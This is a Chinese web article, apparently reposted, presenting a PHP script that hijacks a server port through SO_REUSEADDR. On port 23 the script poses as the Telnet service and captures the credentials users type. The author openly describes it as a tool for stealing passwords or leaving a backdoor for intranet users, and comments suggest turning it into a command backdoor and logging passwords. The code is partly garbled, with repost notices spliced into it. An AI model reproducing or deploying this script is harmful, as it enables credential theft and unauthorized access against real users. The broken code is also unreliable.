PHP下实现端口复用/劫持

推荐末日

推荐末日

2016-01-29 15:02

PHP下实现端口复用/劫持,PHP下实现端口复用/劫持
 

假如监听127.0.0.1 ,访问共网IP不受影响,假如监听公网IP,127。0。0。1等IP不受影响。
这个可以用于欺骗用户密码,因为原来的服务不可用了。或者留成针对内网用户的后门。
最后欢迎加MSN:CQXY[AT]21CN。NET赐教。
#!/usr/bin/php -q
#c0dz by Darkness[BST]
#Team:www.bugkidz.org
#E-mail:cqxy[at]21cn.net
if ($argc != 3 || in_array($argc[1] , array('--help','-h','?')))
{
echo "Use:#./$argv[0] www.bugkidz.org 192.168.0.1 21rn";
echo "c0dz By Darkness[BST]";
exit;
}
error_reporting(E_ALL);

set_time_limit(0);

ob_implicit_flush();

$host = $argv[1];
$port = $argv[2];
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
echo "socket_create() failed: reason: " . socket_strerror($sock) . "n";
} /*建立SOCKET*/
socket_set_option($sock,SOL_SOCKET,SO_REUSEADDR,1); /*设置SOCKET连接的属性为SO_REUSEADDR,这样才可以端口复用*/
if (($ret = socket_bind($sock, $host, $port)) < 0) {
echo "socket_bind() failed: reason: " . socket_strerror($ret) . "n";
}/*绑定端口*/

if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "n";
} /*开始监听*/


while(true) {

if (($sniffer = socket_accept($sock)) < 0) {
echo "socket_accept() failed: reason: " . socket_strerror($sniffer) . "n";
break;
}
if ($port == 23)
{
$txt = "Welcome to the Telnet Serverrn";
$txt .="User:rn";
socket_write($sniffer, $txt, strlen($txt));
} /*这里是伪装信息,把自己伪装成原来的TELNET服务器,这样来骗取密码*/

while(true) {

if(($buf _read($sniffer"=@socket_read($sniffer, 2048, PHP_BINARY_READ)) ==false)
{

break;

}

if (!$buf = trim($buf)) {
continue;
}


if ($buf == '!quit') {
break;
}
if ($buf == '!shutdown') {
socket_close($sniffer);
break 2; /*其实这里可以调用system(),搞成一个CMD后门,反正你想怎么改都可以*/
}

$sniff_data = "$bufrn";

(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/php/)

/* else socket_write($sniffer, $sniff_data, strlen($sniff_data));*/
echo $sniff_data;
/*输出字符串,这里可以加进文件处理,保存密码什么的*/
}
socket_close($sniffer);

(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/php/)


}
socket_close($resock);
socket_close($sock);
?

 
展开更多 50%)
分享

猜你喜欢

PHP下实现端口复用/劫持

PHP
PHP下实现端口复用/劫持

CB下实现对端口读写的两种方法

编程语言 网络编程
CB下实现对端口读写的两种方法

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

PHP下ereg实现匹配ip的正则

Web开发
PHP下ereg实现匹配ip的正则

实用比较:JAVA事件模式下PHP如何实现

PHP
实用比较:JAVA事件模式下PHP如何实现

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

I/O端口读写的实现

编程语言 网络编程
I/O端口读写的实现

Php做的端口嗅探器--可以指定网站和端口

PHP
Php做的端口嗅探器--可以指定网站和端口

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

《全民小镇》攻略之订单详细分析

《全民小镇》攻略之订单详细分析

《刀塔传奇》全能英雄是那个

《刀塔传奇》全能英雄是那个
下拉加载更多内容 ↓